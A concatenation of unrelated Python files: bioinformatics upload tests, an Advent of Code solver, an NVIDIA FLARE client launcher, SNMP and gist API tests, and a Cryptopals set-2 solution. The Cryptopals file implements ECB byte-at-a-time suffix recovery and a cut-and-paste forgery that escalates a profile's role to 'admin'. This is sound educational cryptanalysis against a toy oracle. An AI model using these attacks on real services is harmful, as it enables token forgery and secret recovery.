"src": "igv_human.lf.vcf",
"species": "Homo sapiens",
"build": "b37",
},
)
self.assertFile(vcf, "vcf", "igv_human.lf.vcf.gz", compression="gzip")
self.assertFileExists(vcf, "tbi")
self.assertFields(vcf, "species", "Homo sapiens")
self.assertFields(vcf, "build", "b37")
@tag_process("upload-gff3")
def test_upload_gff3(self):
inputs = {
"src": "PGSC upload.gff3",
"build": "ST",
"source": "PGSC",
"species": "Solanum tuberosum",
}
upload_gff3 = self.run_process("upload-gff3", inputs)
del upload_gff3.output["annot_sorted_track_jbrowse"][
"total_size"
] # Non-deterministic output.
self.assertFile(upload_gff3, "annot_sorted", "PGSC upload_sorted.gff3")
del upload_gff3.output["annot_sorted_idx_igv"][
"total_size"
] # Non-deterministic output.
self.assertFields(
upload_gff3,
"annot_sorted_idx_igv",
{"file": "PGSC upload_sorted.gff3.idx"},
)
self.assertFields(
upload_gff3,
"annot_sorted_track_jbrowse",
{"refs": ["tracks/annotation", "seq", "names"], "file": "trackList.json"},
)
self.assertFields(upload_gff3, "species", "Solanum tuberosum")
self.assertFields(upload_gff3, "build", "ST")
@tag_process("upload-gtf")
def test_upload_gtf(self):
inputs = {
"src": "Hs GRCh38_86 upload.gtf",
"build": "hg19",
"source": "ENSEMBL",
"species": "Homo Sapiens",
}
upload_gtf = self.run_process("upload-gtf", inputs)
del upload_gtf.output["annot_sorted_track_jbrowse"][
"total_size"
] # Non-deterministic output.
self.assertFile(upload_gtf, "annot_sorted", "Hs GRCh38_86 upload_sorted.gtf")
del upload_gtf.output["annot_sorted_idx_igv"][
"total_size"
] # Non-deterministic output.
self.assertFields(
upload_gtf,
"annot_sorted_idx_igv",
{"file": "Hs GRCh38_86 upload_sorted.gtf.idx"},
)
self.assertFields(
upload_gtf,
"annot_sorted_track_jbrowse",
{"refs": ["tracks/annotation", "seq", "names"], "file": "trackList.json"},
)
self.assertFields(upload_gtf, "species", "Homo Sapiens")
self.assertFields(upload_gtf, "build", "hg19")
@tag_process("upload-sc-10x")
def test_upload_sc_reads(self):
inputs = {
"barcodes": ["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
"reads": ["10x_S1_L001_R2_001.fastq.gz"],
}
wrong_mates = self.run_process("upload-sc-10x", inputs, Data.STATUS_ERROR)
error_msg = ["The number of reads and barcodes fastqs must be the same."]
self.assertEqual(wrong_mates.process_error, error_msg)
inputs = {
"barcodes": ["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
"reads": ["10x_S1_L001_R2_001.fastq.gz", "10x_S1_L002_R2_001.fastq.gz"],
}
reads = self.run_process("upload-sc-10x", inputs)
self.assertFiles(
reads,
"barcodes",
["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
compression="gzip",
)
self.assertFiles(
reads,
"reads",
["10x_S1_L001_R2_001.fastq.gz", "10x_S1_L002_R2_001.fastq.gz"],
compression="gzip",
)
@tag_process("upload-bedpe")
def test_upload_bedpe(self):
species = "Homo sapiens"
build = "fake_genome_RSEM"
in_file = "./annotation_bedpe/input/alk.bedpe"
inputs_bedpe = {"src": in_file, "species": species, "build": build}
bedpe = self.run_process("upload-bedpe", inputs_bedpe)
self.assertFile(bedpe, "bedpe", in_file)
self.assertFields(bedpe, "species", species)
self.assertFields(bedpe, "build", build)
@tag_process("upload-orange-metadata")
def test_upload_metadata(self):
base = Path("metadata_upload")
inputs = base / "inputs"
meta = self.run_process(
"upload-orange-metadata",
{
"src": str(inputs / "sample_metatable.tsv"),
},
)
self.assertFile(meta, "table", str(inputs / "sample_metatable.tsv"))
self.assertFields(meta, "n_samples", 8)
self.assertFields(meta, "features", "2 (12.5% missing values)")
self.assertFields(
meta, "target", "Regression; numerical class (12.5% missing values)"
)
self.assertFields(meta, "n_metas", 2)
meta_tab = self.run_process(
"upload-orange-metadata",
{
"src": str(inputs / "iris_legacy.TAB"),
},
)
self.assertFile(meta_tab, "table", str(inputs / "iris_legacy.TAB"))
self.assertFields(meta_tab, "n_samples", 6)
self.assertFields(meta_tab, "features", "4 (no missing values)")
self.assertFields(
meta_tab,
"target",
"Classification; categorical class with 3 values (no missing values)",
)
self.assertFields(meta_tab, "n_metas", 0)
info = ["File extension of the table was replaced with a lower case version."]
self.assertEqual(meta_tab.process_info, info)
meta_xlsx = self.run_process(
"upload-orange-metadata",
{
"src": str(inputs / "sample_metatable.xlsx"),
},
)
self.assertFile(meta_xlsx, "table", str(inputs / "sample_metatable.xlsx"))
self.assertFields(meta_xlsx, "n_samples", 8)
self.assertFields(meta_xlsx, "features", "2 (12.5% missing values)")
self.assertFields(
meta_xlsx, "target", "Regression; numerical class (12.5% missing values)"
)
self.assertFields(meta_xlsx, "n_metas", 2)
empty = self.run_process(
"upload-orange-metadata",
{
"src": str(inputs / "empty.tsv"),
},
Data.STATUS_ERROR,
)
error_msg = ["The uploaded table contains no samples."]
self.assertEqual(empty.process_error, error_msg)
malformed = self.run_process(
"upload-orange-metadata",
{
"src": str(inputs / "malformed.tsv"),
},
Data.STATUS_ERROR,
)
error_msg = [
"Orange is unable to read the provided data table. "
"Cannot parse dataset malformed.tsv: Non-continuous value "
"in (1-based) line 4, column 3"
]
self.assertEqual(malformed.process_error, error_msg)
@tag_process("upload-proteomics-sample")
def test_upload_proteomics_sample(self):
base = Path("proteomics")
inputs = base / "input"
outputs = base / "output"
prot_data = self.run_process(
"upload-proteomics-sample",
{
"src": str(inputs / "single_sample.txt"),
"species": "Homo sapiens",
},
)
self.assertFile(prot_data, "table", str(outputs / "single_sample.txt"))
self.assertFields(prot_data, "species", "Homo sapiens")
self.assertFields(prot_data, "source", "UniProtKB")
@tag_process("upload-proteomics-sample-set")
def test_upload_proteomics_sample_set(self):
base = Path("proteomics")
inputs = base / "input"
outputs = base / "output"
prot_data = self.run_process(
"upload-proteomics-sample-set",
{
"src": str(inputs / "sample_set.txt"),
"species": "Homo sapiens",
},
)
self.assertFile(prot_data, "table", str(outputs / "sample_set.txt"))
self.assertFields(prot_data, "species", "Homo sapiens")
self.assertFields(prot_data, "source", "UniProtKB")
for data in Data.objects.all():
self.assertStatus(data, Data.STATUS_DONE)
self.assertEqual(
Data.objects.filter(process__slug="upload-proteomics-sample").count(), 2
)
@skipUnlessLargeFiles(
"6042316072_R03C01_Red.idat.gz", "6042316072_R03C01_Grn.idat.gz"
)
@tag_process("upload-idat")
def test_upload_idat(self):
large = Path("large")
base_path = Path("methylation") / "inputs"
inputs = {
"red_channel": large / "6042316072_R03C01_Red.idat.gz",
"green_channel": large / "6042316072_R03C01_Grn.idat.gz",
"species": "Homo sapiens",
"platform": "HM450",
}
idat = self.run_process("upload-idat", inputs)
self.assertFile(
idat,
"red_channel",
large / "6042316072_R03C01_Red.idat.gz",
compression="gzip",
)
self.assertFile(
idat,
"green_channel",
large / "6042316072_R03C01_Grn.idat.gz",
compression="gzip",
)
self.assertFields(idat, "species", "Homo sapiens")
self.assertFields(idat, "platform", "HM450")
inputs.update({"species": "Mus musculus"})
wrong_species_input = self.run_process("upload-idat", inputs, Data.STATUS_ERROR)
error_msg = [
"Platform type HM450 does not match the selected species Mus musculus."
]
self.assertEqual(wrong_species_input.process_error, error_msg)
inputs.update(
{
"red_channel": base_path / "wrong_sample_name_Blue.idat.gz",
"species": "Homo sapiens",
}
)
self.run_process("upload-idat", inputs, Data.STATUS_ERROR)
@tag_process("upload-vep-cache")
def test_upload_vep_cache(self):
input_folder = Path("ensembl-vep") / "input"
output_folder = Path("ensembl-vep") / "output"
vep_cache = self.run_process(
"upload-vep-cache",
{
"cache_file": input_folder / "cache_homo_sapiens_X.tar.gz",
"species": "Homo sapiens",
"build": "GRCh38",
"release": "104",
},
)
self.assertDir(
vep_cache, "cache", output_folder / "cache_homo_sapiens_X.tar.gz"
)
self.assertFields(vep_cache, "species", "Homo sapiens")
self.assertFields(vep_cache, "build", "GRCh38")
self.assertFields(vep_cache, "release", "104")
|
<gh_stars>0
import unittest
import random
from Crypto.Cipher import AES
from set1 import fromAscii, toAscii, fromB64
from set1 import fixedXor
from set1 import isECBEncrypted
def pkcs7Padding(data, blockSize=16):
missingBytesNumber = (-len(data))%blockSize
if missingBytesNumber == 0:
missingBytesNumber = blockSize
return data + bytes([missingBytesNumber for _ in range(missingBytesNumber)])
def pkcs7Unpadding(data):
paddingLength = int(data[len(data)-1])
return data[:-paddingLength]
def encryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
block = fixedXor(data[blockNumber*16:(blockNumber+1)*16], iv)
iv = AES.new(key, AES.MODE_ECB).encrypt(block)
res += iv
return res
def decryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
decryptedBlock = AES.new(key, AES.MODE_ECB).decrypt(data[blockNumber*16:(blockNumber+1)*16])
res += fixedXor(decryptedBlock, iv)
iv = data[blockNumber*16:(blockNumber+1)*16]
return res
def getRandomAESKey():
return bytes([random.randrange(0,256) for _ in range(16)])
UNKNOWN_AES_KEY = getRandomAESKey()
def oracle(data, key=None):
data = bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))]) + data
data += bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))])
data = pkcs7Padding(data)
isECB = True if random.randrange(2) == 0 else False
key = getRandomAESKey() if key == None else key
if isECB:
return AES.new(key).encrypt(data), isECB, key
else:
return encryptAESCBC(data, key), isECB, key
def encryptAESECBWithFixedSuffix(data, key=None, suffix=None):
# Default suffix comes from challenge 12
suffix = fromB64('<KEY>') if suffix == None else suffix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(data+suffix))
def encryptAESECBWithFixedPrefixSuffix(data, key=None, suffix=None, prefix=None):
# Default suffix comes from challenge 12
suffix = fromB64('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK') if suffix == None else suffix
prefix = fromAscii('Thats our fixed-length prefix') if prefix == None else prefix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(prefix+data+suffix))
def guessOracleBlockSize(oracle):
dataLength, ciphered = 0, oracle(bytes(0))
firstLength = len(ciphered)
while len(ciphered) == firstLength:
dataLength += 1
ciphered = oracle(bytes(dataLength))
blockSize = len(ciphered) - firstLength
dataLength -= 1
suffixLength = firstLength - dataLength
return blockSize, suffixLength
def guessSuffix(oracle):
blockSize, suffixLength = guessOracleBlockSize(oracle)
res = []
data = bytes(range(48,64))
foundBytes = 0
while foundBytes < suffixLength:
if (foundBytes % blockSize) == 0 and foundBytes > 0:
data = bytes(res[foundBytes-blockSize:foundBytes])
data = data[1:]
firstCipher = oracle(data)
targetBlock = firstCipher[(foundBytes//blockSize)*blockSize:(foundBytes//blockSize+1)*blockSize]
b, found = -1, False
while not(found):
b += 1
cipher = oracle(data + bytes(res[(foundBytes//blockSize)*blockSize:]) + bytes([b]))
found = (cipher[0:blockSize] == targetBlock)
res += [b]
foundBytes += 1
return bytes(res)
def parseKeyValue(string):
res = {}
for kv in string.split('&'):
key, value = kv.split('=')
res[key] = value
return res
def toKeyValueString(dic):
return '&'.join([key + '=' + str(dic[key]) for key in ['email', 'uid', 'role']])
def profileFor(email):
if '&' in email or '=' in email:
raise Exception('Illegal character in email: ' + email)
return toKeyValueString({'email': email, 'uid': 10, 'role': 'user'})
def encryptUserProfile(email):
return AES.new(UNKNOWN_AES_KEY).encrypt(pkcs7Padding(fromAscii(profileFor(email))))
def decryptUserProfile(data):
profileString = pkcs7Unpadding(AES.new(UNKNOWN_AES_KEY).decrypt(data))
return parseKeyValue(toAscii(profileString))
class Tester(unittest.TestCase):
def testChallenge9(self):
input = fromAscii('YELLOW SUBMARINE')
output = fromAscii('YELLOW SUBMARINE\x04\x04\x04\x04')
self.assertEqual(pkcs7Padding(input, 20), output)
def testChallenge10(self):
input = fromAscii('YELLOW SUBMARINEYELLOW SUBMARINE')
key = b'YELLOW SUBMARINE'
self.assertEqual(decryptAESCBC(encryptAESCBC(input, key), key), input)
with open('resources/set2-challenge10.txt', 'r') as testDataFile:
input = fromB64(testDataFile.read().replace('\n', ''))
self.assertIn(b'Let the witch doctor, Ice, do the dance to cure ', decryptAESCBC(input, key))
def testChallenge11(self):
for _ in range(100):
cipheredData, isECB, key = oracle(bytes(100))
self.assertEqual(isECB, isECBEncrypted(cipheredData))
def testChallenge12(self):
self.assertEqual(guessOracleBlockSize(encryptAESECBWithFixedSuffix)[0], 16)
self.assertEqual(True, isECBEncrypted(encryptAESECBWithFixedSuffix(bytes(100))))
suffix = guessSuffix(encryptAESECBWithFixedSuffix)
self.assertIn('The girlies on standby waving just to say hi', toAscii(suffix))
def testChallenge13(self):
input = '<EMAIL>'
cipheredProfile = encryptUserProfile(input)
clearProfile = decryptUserProfile(cipheredProfile)
self.assertEqual('user', clearProfile['role'])
# First, we build an email such that the length of the string "email=EMAIL&uid=10&role=" is a multiple of 16
email = ''.join('a' for _ in range(-(len("email=&uid=10&role="))%16))
email += '@letstrythis.com' # Adding a 16 characters-long string for style
honestCipher = encryptUserProfile(email)
# Then we build an email that will give us the cipher of 'admin\x0b\x0b...\x0b'
fakeEmail = ''.join(['a' for _ in range(10)])
fakeEmail += 'admin' + ''.join([chr(11) for _ in range(11)])
fakeProfileCipher = encryptUserProfile(fakeEmail)
adminBlock = fakeProfileCipher[16:32]
# And we replkace the end of our honestCipher with this block
tamperedCipher = honestCipher[:-16]
tamperedCipher += adminBlock
tamperedProfile = decryptUserProfile(tamperedCipher)
self.assertEqual(email, tamperedProfile['email'])
self.assertEqual('admin', tamperedProfile['role'])
if __name__ == '__main__':
unittest.main() |
<reponame>xphade/aoc2021<gh_stars>1-10
#!/usr/bin/env python3
from aoc_utils import get_input_path, print_elapsed_time
import re
from timeit import default_timer as timer
from typing import Iterable, List, Tuple
def extract_ranges(raw_content: str) -> Tuple[Iterable[int], Iterable[int]]:
"""Extract the x and y target ranges from the raw string"""
numbers = [*map(int, re.findall(r"-?\d+", raw_content))]
assert len(numbers) == 4
range_x = range(numbers[0], numbers[1] + 1)
range_y = range(numbers[2], numbers[3] + 1)
return (range_x, range_y)
def calculate_maximum_position(velocity: int) -> int:
"""Calculate the maximum position if `velocity` decreases by one after each step"""
final_position = (velocity * (velocity + 1)) // 2 # Gauss summation strikes again
return final_position
def calculate_maximum_height(target: Iterable[int]):
"""Calculate the maximum achievable height given the `target` range"""
# Maximum velocity such that the probe doesn't overshoot the target on the way down
max_velocity = abs(min(target)) - 1
return calculate_maximum_position(max_velocity)
def get_velocity_range_x(target: Iterable[int]) -> Iterable[int]:
"""Get the x-velocity range to reach the `target`"""
min_velocity = 0
while calculate_maximum_position(min_velocity) < min(target):
min_velocity += 1
max_velocity = max(target)
return range(min_velocity, max_velocity + 1)
def get_velocity_range_y(target: Iterable[int]) -> Iterable[int]:
"""Get the y-velocity range to reach the `target`"""
target_minimum = min(target)
min_velocity = target_minimum
max_velocity = abs(target_minimum) - 1
return range(min_velocity, max_velocity + 1)
def is_valid_initial_velocity(
x_velocity: int, y_velocity: int, x_target: Iterable[int], y_target: Iterable[int]
) -> bool:
"""Check if the probe will hit the target with the given initial velocity"""
x_position = 0
y_position = 0
x_max = max(x_target)
y_min = min(y_target)
while x_position <= x_max and y_position >= y_min:
x_position += x_velocity
y_position += y_velocity
x_velocity = max(0, x_velocity - 1)
y_velocity -= 1
if x_position in x_target and y_position in y_target:
return True
return False
def calculate_valid_initial_velocities(
x_target: Iterable[int], y_target: Iterable[int]
) -> List[Tuple[int, int]]:
"""Calculate all valid initial velocities"""
x_velocities = get_velocity_range_x(x_target)
y_velocities = get_velocity_range_y(y_target)
valid_velocities: List[Tuple[int, int]] = []
# For every velocity combination, check if it is valid
for x_vel in x_velocities:
for y_vel in y_velocities:
if is_valid_initial_velocity(x_vel, y_vel, x_target, y_target):
valid_velocities.append((x_vel, y_vel))
return valid_velocities
def main():
data_path = get_input_path("Day 17: Trick Shot")
with open(data_path, "r") as file:
content = file.read()
target_x, target_y = extract_ranges(content)
start = timer()
max_height = calculate_maximum_height(target_y)
valid_velocities = calculate_valid_initial_velocities(target_x, target_y)
stop = timer()
print("Maximum reachable height:", max_height)
print("Number of valid initial velocities:", len(valid_velocities))
print_elapsed_time(start, stop)
if __name__ == "__main__":
main()
|
<reponame>ZiyueXu77/NVFlare
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated client launching script."""
import argparse
import os
import sys
import time
from nvflare.apis.fl_constant import WorkspaceConstants
from nvflare.fuel.common.excepts import ConfigError
from nvflare.fuel.sec.audit import AuditService
from nvflare.fuel.sec.security_content_service import LoadResult, SecurityContentService
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import AppFolderConstants, SSLConstants
from nvflare.private.fed.app.fl_conf import FLClientStarterConfiger
from nvflare.private.fed.client.admin import FedAdminAgent
from nvflare.private.fed.client.admin_msg_sender import AdminMessageSender
from nvflare.private.fed.client.client_engine import ClientEngine
from nvflare.private.fed.client.fed_client import FederatedClient
from nvflare.private.fed.utils.fed_utils import add_logfile_handler
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
parser.add_argument(
"--fed_client", "-s", type=str, help="an aggregation server specification json file", required=True
)
parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
parser.add_argument("--local_rank", type=int, default=0)
args = parser.parse_args()
kv_list = parse_vars(args.set)
config_folder = kv_list.get("config_folder", "")
if config_folder == "":
args.client_config = AppFolderConstants.CONFIG_FED_CLIENT
else:
args.client_config = os.path.join(config_folder, AppFolderConstants.CONFIG_FED_CLIENT)
# TODO:: remove env and train config since they are not core
args.env = os.path.join("config", AppFolderConstants.CONFIG_ENV)
args.train_config = os.path.join("config", AppFolderConstants.CONFIG_TRAIN)
args.log_config = None
for name in [WorkspaceConstants.RESTART_FILE, WorkspaceConstants.SHUTDOWN_FILE]:
try:
f = os.path.join(args.workspace, name)
if os.path.exists(f):
os.remove(f)
except BaseException:
print("Could not remove the {} file. Please check your system before starting FL.".format(name))
sys.exit(-1)
rank = args.local_rank
try:
os.chdir(args.workspace)
AuditService.initialize(audit_file_name=WorkspaceConstants.AUDIT_LOG)
startup = os.path.join(args.workspace, "startup")
conf = FLClientStarterConfiger(
app_root=startup,
client_config_file_name=args.fed_client,
log_config_file_name=WorkspaceConstants.LOGGING_CONFIG,
kv_list=args.set,
)
conf.configure()
log_file = os.path.join(args.workspace, "log.txt")
add_logfile_handler(log_file)
trainer = conf.base_deployer
security_check(secure_train=trainer.secure_train, content_folder=startup, fed_client_config=args.fed_client)
federated_client = trainer.create_fed_client(args)
while not federated_client.sp_established:
print("Waiting for SP....")
time.sleep(1.0)
federated_client.use_gpu = False
federated_client.config_folder = config_folder
if rank == 0:
federated_client.register()
if not federated_client.token:
print("The client could not register to server. ")
raise RuntimeError("Login failed.")
federated_client.start_heartbeat()
servers = [{t["name"]: t["service"]} for t in trainer.server_config]
admin_agent = create_admin_agent(
trainer.client_config,
trainer.client_name,
trainer.req_processors,
trainer.secure_train,
sorted(servers)[0],
federated_client,
args,
trainer.multi_gpu,
rank,
)
admin_agent.start()
trainer.close()
except ConfigError as ex:
print("ConfigError:", str(ex))
finally:
pass
sys.exit(0)
def security_check(secure_train: bool, content_folder: str, fed_client_config: str):
"""To check the security content if running in security mode.
Args:
secure_train (bool): if run in secure mode or not.
content_folder (str): the folder to check.
fed_client_config (str): fed_client.json
"""
# initialize the SecurityContentService.
# must do this before initializing other services since it may be needed by them!
SecurityContentService.initialize(content_folder=content_folder)
if secure_train:
insecure_list = secure_content_check(fed_client_config)
if len(insecure_list):
print("The following files are not secure content.")
for item in insecure_list:
print(item)
sys.exit(1)
# initialize the AuditService, which is used by command processing.
# The Audit Service can be used in other places as well.
AuditService.initialize(audit_file_name=WorkspaceConstants.AUDIT_LOG)
def secure_content_check(config: str):
"""To check the security contents.
Args:
config (str): fed_client.json
Returns:
A list of insecure content.
"""
insecure_list = []
data, sig = SecurityContentService.load_json(config)
if sig != LoadResult.OK:
insecure_list.append(config)
client = data["client"]
content, sig = SecurityContentService.load_content(client.get(SSLConstants.CERT))
if sig != LoadResult.OK:
insecure_list.append(client.get(SSLConstants.CERT))
content, sig = SecurityContentService.load_content(client.get(SSLConstants.PRIVATE_KEY))
if sig != LoadResult.OK:
insecure_list.append(client.get(SSLConstants.PRIVATE_KEY))
content, sig = SecurityContentService.load_content(client.get(SSLConstants.ROOT_CERT))
if sig != LoadResult.OK:
insecure_list.append(client.get(SSLConstants.ROOT_CERT))
return insecure_list
def create_admin_agent(
client_args,
client_id,
req_processors,
secure_train,
server_args,
federated_client: FederatedClient,
args,
is_multi_gpu,
rank,
):
"""Creates an admin agent.
Args:
client_args: start client command args
client_id: client name
req_processors: request processors
secure_train: True/False
server_args: FL server args
federated_client: FL client object
args: command args
is_multi_gpu: True/False
rank: client rank process number
Returns:
A FedAdminAgent.
"""
sender = AdminMessageSender(
client_name=federated_client.token,
root_cert=client_args[SSLConstants.ROOT_CERT],
ssl_cert=client_args[SSLConstants.CERT],
private_key=client_args[SSLConstants.PRIVATE_KEY],
server_args=server_args,
secure=secure_train,
is_multi_gpu=is_multi_gpu,
rank=rank,
)
client_engine = ClientEngine(federated_client, federated_client.token, sender, args, rank)
admin_agent = FedAdminAgent(
client_name="admin_agent",
sender=sender,
app_ctx=client_engine,
)
admin_agent.app_ctx.set_agent(admin_agent)
federated_client.set_client_engine(client_engine)
for processor in req_processors:
admin_agent.register_processor(processor)
return admin_agent
if __name__ == "__main__":
"""
This is the main program when starting the NVIDIA FLARE client process.
"""
# # For MacOS, it needs to use 'spawn' for creating multi-process.
# if os.name == 'posix':
# import multiprocessing
# multiprocessing.set_start_method('spawn')
# import multiprocessing
# multiprocessing.set_start_method('spawn')
main()
|
#!/usr/bin/env python3
"""Test the mib_essswitch module."""
import os
import sys
import unittest
from mock import Mock
# Try to create a working PYTHONPATH
TEST_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
SWITCHMAP_DIRECTORY = os.path.abspath(os.path.join(TEST_DIRECTORY, os.pardir))
ROOT_DIRECTORY = os.path.abspath(os.path.join(SWITCHMAP_DIRECTORY, os.pardir))
if TEST_DIRECTORY.endswith('/switchmap-ng/switchmap/test') is True:
sys.path.append(ROOT_DIRECTORY)
else:
print(
'This script is not installed in the "switchmap-ng/bin" directory. '
'Please fix.')
sys.exit(2)
from switchmap.snmp import mib_essswitch as testimport
class Query(object):
"""Class for snmp_manager.Query mock.
A detailed tutorial about Python mocks can be found here:
http://www.drdobbs.com/testing/using-mocks-in-python/240168251
"""
def query(self):
"""Do an SNMP query."""
pass
def oid_exists(self):
"""Determine existence of OID on device."""
pass
def swalk(self):
"""Do a failsafe SNMPwalk."""
pass
class KnownValues(unittest.TestCase):
"""Checks all functions and methods."""
#########################################################################
# General object setup
#########################################################################
# SNMPwalk results used by Mocks.
# Normalized walk returning integers
nwalk_results_integer = {
100: 1234,
200: 5678
}
def test_supported(self):
"""Testing method / function supported."""
# Set the stage for oid_exists returning True
snmpobj = Mock(spec=Query)
mock_spec = {'oid_exists.return_value': True}
snmpobj.configure_mock(**mock_spec)
# Test supported
testobj = testimport.init_query(snmpobj)
self.assertEqual(testobj.supported(), True)
# Set the stage for oid_exists returning False
mock_spec = {'oid_exists.return_value': False}
snmpobj.configure_mock(**mock_spec)
# Test unsupported
testobj = testimport.init_query(snmpobj)
self.assertEqual(testobj.supported(), False)
def test_layer1(self):
"""Testing method / function layer1."""
# Initializing key variables
expected_dict = {
100: {'swPortDuplexStatus': 1234},
200: {'swPortDuplexStatus': 5678}
}
# Set the stage for SNMPwalk
snmpobj = Mock(spec=Query)
mock_spec = {'swalk.return_value': self.nwalk_results_integer}
snmpobj.configure_mock(**mock_spec)
# Get results
testobj = testimport.init_query(snmpobj)
results = testobj.layer1()
# Basic testing of results
for primary in results.keys():
for secondary in results[primary].keys():
self.assertEqual(
results[primary][secondary],
expected_dict[primary][secondary])
def test_swportduplexstatus(self):
"""Testing method / function swportduplexstatus."""
# Set the stage for SNMPwalk
snmpobj = Mock(spec=Query)
mock_spec = {'swalk.return_value': self.nwalk_results_integer}
snmpobj.configure_mock(**mock_spec)
# Get results
testobj = testimport.init_query(snmpobj)
results = testobj.swportduplexstatus()
# Basic testing of results
for key in results.keys():
self.assertEqual(isinstance(key, int), True)
# Test that we are getting the correct OID
results = testobj.swportduplexstatus(oidonly=True)
self.assertEqual(results, '.1.3.6.1.4.1.437.1.1.3.3.1.1.30')
if __name__ == '__main__':
# Do the unit test
unittest.main()
|
# encoding: utf-8
from base import APITestCase
from vilya.libs.store import store
from vilya.models.gist_comment import GistComment
class GistTest(APITestCase):
def setUp(self):
store.execute('delete from gist_stars where id<10')
super(GistTest, self).setUp()
self.gist1 = self._add_gist(
description='this is my first gist',
owner_id='xutao'
)
self.gist2 = self._add_gist(
description='this is my second gist',
owner_id='xutao'
)
self.gist3 = self._add_gist(
description='this is my second gist',
owner_id='lisong_intern',
gist_names=["gistname1.txt", "gistname2.txt"],
gist_contents=["first", "second"]
)
self.api_token = self.create_api_token('<PASSWORD>')
self.api_token2 = self.create_api_token('<PASSWORD>')
def test_your_gists(self):
ret = self.app.get(
"/api/gists/",
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertEquals(len(ret), 10)
def test_your_starred_gists(self):
ret = self.app.put(
"/api/gists/%s/star" % self.gist1.id,
status=204,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
ret = self.app.get(
"/api/gists/starred",
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertEquals(len(ret), 1)
def test_get_a_not_exist_gist(self):
ret = self.app.get(
"/api/gists/%s/" % "444444444",
status=404,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertProblemType(ret['type'], "not_found")
self.assertTrue("gist" in ret["message"])
def test_get_single_gist(self):
ret = self.app.get(
"/api/gists/%s/" % self.gist1.id,
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertTrue('description' in ret)
self.assertTrue('files' in ret)
self.assertTrue('url' in ret)
self.assertEquals(ret["public"], True)
def test_get_single_gist_src(self):
ret = self.app.get(
"/api/gists/%s/src" % self.gist3.id,
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertTrue('path' in ret)
self.assertTrue('type' in ret)
self.assertTrue(isinstance(ret['src'], list))
def test_get_single_gist_source(self):
ret = self.app.get(
"/api/gists/%s/source" % self.gist3.id,
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertTrue(isinstance(ret['source'], list))
def test_create_a_gist(self):
description = "my gist"
filename1 = "file1.txt"
filename2 = "gist.md"
content1 = "sent from icode"
content2 = "##sent from icode"
ret = self.app.post_json(
"/api/gists/",
dict(description="my gist", files={
filename1: {"content": content1},
filename2: {"content": content2}
}),
status=201,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertEquals(ret['description'], description)
self.assertTrue(filename1 in ret["files"])
self.assertTrue(filename2 in ret["files"])
def test_create_a_private_gist(self):
filename1 = "file1.txt"
filename2 = "gist.md"
content1 = "sent from icode"
content2 = "##sent from icode"
ret = self.app.post_json(
"/api/gists/",
dict(description="my gist", public=False, files={
filename1: {"content": content1},
filename2: {"content": content2}
}),
status=201,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
gist_id = ret["id"]
self.assertEquals(ret['public'], False)
ret = self.app.get(
"/api/gists/%s/" % gist_id,
status=403,
headers=dict(Authorization="Bearer %s" % self.api_token2.token)
)
def test_edit_a_gist(self):
filename1 = "file1.txt"
filename2 = "gist.md"
content1 = "sent from icode"
content2 = "##sent from icode"
ret = self.app.post_json(
"/api/gists/",
dict(description="my gist", files={
filename1: {"content": content1},
filename2: {"content": content2}
}),
status=201,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
gist_id = ret["id"]
new_description = "new gist"
new_content1 = "########sent from icode"
ret = self.app.patch_json(
"/api/gists/%s/" % gist_id,
dict(description=new_description, files={
filename1: {"content": new_content1}
}),
status=200,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
).json
self.assertEquals(ret['description'], new_description)
# self.assertEquals(new_content1, self.app.get(
# ret["files"][filename1]['raw_url']).body)
# self.assertEquals(content2, self.app.get(
# ret["files"][filename2]['raw_url']).body)
def test_star_a_gist(self):
self.app.put(
"/api/gists/%s/star" % self.gist1.id,
status=204,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
self.app.get(
"/api/gists/%s/star" % self.gist1.id,
status=204,
headers=dict(Authorization="Bearer %s" % self.api_token.token)
)
def test_unstar_a_gist(self):
self.app.delete(
